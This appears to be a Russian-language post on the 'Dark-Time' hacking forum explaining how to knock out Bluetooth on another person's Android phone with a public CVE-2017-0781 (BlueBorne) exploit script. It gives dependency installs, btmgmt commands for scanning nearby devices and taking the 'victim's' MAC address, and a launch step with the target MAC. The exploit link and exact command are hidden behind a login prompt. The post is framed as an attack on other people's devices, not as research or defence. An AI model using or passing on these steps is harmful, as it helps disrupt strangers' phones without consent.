Как отключить Bluetooth на чужом девайсе.

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Proxymen

Участник

Proxymen

Участник
22 Июн 2017
36
7
Доброго времени суток. Сегодня хотел бы рассказать вам об уязвимости, которая известно давно...Просто о ней на время забыли, т.к. не выкладывали exploit...И вот на днях совершилось чудо! На гитхабе выложили скрипт python-а с использованием уязвимости(CVE-2017-0781/ Blueborn).
Суть exploit-а в том, что бы вызвать принуждённое отключение bluetooth на устройстве "жертвы". Грубо говоря, exploit бьёт по уязвимым местам прошивки android( как пишут некоторые люди, ios тоже через раз получается) и вызывает ошибку типа null-byte(переполнение буфера).
UPD: Было лично протестировано на своём телефоне - MEIZU M5 NOTE с обновлённым Flyme OS.
Приступим!
>Первым делом нам нужно установить зависимости скрипта.
[SRC]
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
[/SRC]
Затем обновляем модули python.
[SRC]
pip install —upgrade pip
pip install —upgrade pwntools
[/SRC]
Для работы с bluetooth с помощью python нам понадобится модуль pybluez.
[SRC]
apt-get install bluetooth libbluetooth-dev
pip install pybluez
[/SRC]
>Затем приступаем к скачиванию эксплоита(корректней будет назвать скриптом).
[SRC]
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!

>Дальше нам придётся попотеть...Т.к. проблема может быть следующая:
Не работает bluetooth....Для этого используем утиллиту btmgmt.
Запускаем её и делаем следующие шаги:
btmgmt —index 0
power
auto-power
find
Если начнется мониторинг Bluetooth устройств - значит всё готово.
>Используем скрипт. Для этого нам нужен MAC-адресс bluetooth устройства(используем команду btmgmt —index 0 и find).
Как только нашли "жертву", вводим команду.
[SRC]
Пожалуйста, Вход или Регистрация для просмотра содержимого URL-адресов!
TARGET=*mac-адресс с заглавными буквами.*
[/SRC]
И ждём. Мониторить устройство можете с других или же через консоль.
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2024

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя